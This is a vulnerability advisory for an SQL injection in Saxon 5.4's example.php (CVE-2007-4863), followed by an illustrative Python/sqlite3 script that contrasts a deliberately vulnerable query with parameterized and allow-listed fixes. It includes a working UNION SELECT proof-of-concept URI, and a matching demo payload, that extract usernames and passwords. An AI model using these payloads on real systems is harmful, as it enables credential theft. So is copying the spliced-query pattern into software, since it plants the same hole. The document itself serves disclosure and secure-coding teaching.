Saxon Example.PHP SQL Injection Vulnerability
BID: 26238
Info
| Field | Value |
|---|---|
| Bugtraq ID: | 26238 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-4863 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 29 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | netVigilance is credited with the discovery of this vulnerability. |
| Vulnerable: | Quirm Saxon 5.4 |
| Not Vulnerable: | Quirm Saxon 5.41 |
Discussion
Saxon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data (the template parameter of example.php) before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects Saxon 5.4; earlier versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23
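As an added illustration, not code from the advisory or from Saxon itself (whose example.php is not reproduced on this page), the Python/sqlite3 snippet below models the flaw described in the Discussion and the shape of the proof-of-concept above: a template lookup that pastes the template parameter into the query text, shown beside the parameterized and allow-listed lookups that close the hole. The templates table, its columns and the sample rows are constructed for this example; SX_saxon_users, USER_NAME and USER_PWD are taken from the PoC; the constructed payload ends with an SQLite `--` comment where the advisory's URI uses the MySQL `#` (URL-encoded as %23), and its column count matches the two-column query used here rather than the seven columns of the real PoC.

```python
"""Vulnerable vs. hardened template lookup, modelled on the example.php flaw (constructed)."""
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the Saxon schema.

    SX_saxon_users / USER_NAME / USER_PWD come from the advisory's PoC; the
    templates table, its columns and every row are assumptions for this example.
    """
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE templates (name TEXT, body TEXT);
        INSERT INTO templates VALUES ('default', '<html>default</html>');
        CREATE TABLE SX_saxon_users (USER_NAME TEXT, USER_PWD TEXT);
        INSERT INTO SX_saxon_users VALUES ('admin', 's3cret-hash');
        """
    )
    return db


def lookup_template_vulnerable(db: sqlite3.Connection, template: str) -> list:
    """The flawed pattern: the parameter is spliced into the SQL text, so a quote
    in it ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT name, body FROM templates WHERE name = '{template}'"
    return db.execute(sql).fetchall()


def lookup_template_parameterized(db: sqlite3.Connection, template: str) -> list:
    """Fix 1: bind the value. It travels separately from the query text and is
    only ever compared against the column, never parsed as SQL."""
    sql = "SELECT name, body FROM templates WHERE name = ?"
    return db.execute(sql, (template,)).fetchall()


# Allow-list for plausible template names (assumed policy for this example).
TEMPLATE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def is_valid_template_name(template: str) -> bool:
    return TEMPLATE_NAME.match(template) is not None


def lookup_template_hardened(db: sqlite3.Connection, template: str) -> list:
    """Fix 2 (defence in depth): reject input that is not a template name before
    it reaches the database, and still use a bound parameter."""
    if not is_valid_template_name(template):
        raise ValueError("invalid template name")
    return lookup_template_parameterized(db, template)


# Constructed payload in the shape of the advisory's PoC: close the literal, UNION in
# rows from the user table, comment out the trailing quote. SQLite comments use '--'
# rather than the MySQL '#' (%23) seen in the PoC URI.
PAYLOAD = "' UNION SELECT USER_NAME, USER_PWD FROM SX_saxon_users --"


def demo() -> tuple:
    """Run the same input through the vulnerable and the parameterized lookup."""
    db = build_db()
    leaked = lookup_template_vulnerable(db, PAYLOAD)      # returns the users row
    safe = lookup_template_parameterized(db, PAYLOAD)     # returns nothing
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable lookup returned:", leaked)
    print("parameterized lookup returned:", safe)
```

The parameterized version alone removes the injection; the allow-list is there because the class of this BID is an input validation error, and rejecting anything that is not a template name also keeps odd values out of logs and error messages.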
Solution / Fix
Solution:
The vendor has released Saxon 5.41 to address this issue.
Quirm Saxon 5.4
- Quirm saxon5-41.zip: http://www.quirm.net/downloads/saxon/saxon5-41.zip
References